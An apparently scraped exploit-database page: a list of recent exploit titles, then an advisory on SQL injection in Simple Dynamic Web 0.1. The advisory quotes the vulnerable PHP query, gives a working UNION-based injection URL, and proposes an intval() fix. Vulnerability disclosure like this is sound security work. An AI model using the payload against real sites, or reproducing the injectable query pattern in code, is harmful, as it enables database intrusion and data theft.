558ab1fc67
24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
55 lines
No EOL
1.7 KiB
Text
Executable file
55 lines
No EOL
1.7 KiB
Text
Executable file
# Exploit Title.............. Simple Dynamic Web SQL Injection
|
|
# Google Dork................ N/A
|
|
# Date....................... 14/10/2016
|
|
# Exploit Author............. lahilote
|
|
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
|
|
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
|
|
# Version.................... 0.1
|
|
# Tested on.................. xampp
|
|
# CVE........................ N/A
|
|
|
|
|
|
The audit_list in /page.php
|
|
|
|
----snip----
|
|
|
|
$prodID = $_GET['prodid'];
|
|
|
|
if(!empty($prodID)){
|
|
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
|
|
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
|
|
$ptitle = $getProdInfo["title"];
|
|
$pdes = $getProdInfo["description"];
|
|
$pimg = $getProdInfo["imgUrl"];
|
|
}
|
|
|
|
----snip----
|
|
|
|
Example exploitation
|
|
--------------------
|
|
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+
|
|
|
|
How to fix
|
|
----------
|
|
Simple method's use the php function intval.
|
|
For example
|
|
|
|
$prodID = intval($_GET['prodid']);
|
|
|
|
if(!empty($prodID)){
|
|
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
|
|
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
|
|
$ptitle = $getProdInfo["title"];
|
|
$pdes = $getProdInfo["description"];
|
|
$pimg = $getProdInfo["imgUrl"];
|
|
}
|
|
|
|
|
|
Credits
|
|
-------
|
|
This vulnerability was discovered and researched by lahilote
|
|
|
|
References
|
|
----------
|
|
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
|
|
http://php.net/manual/en/function.intval.php |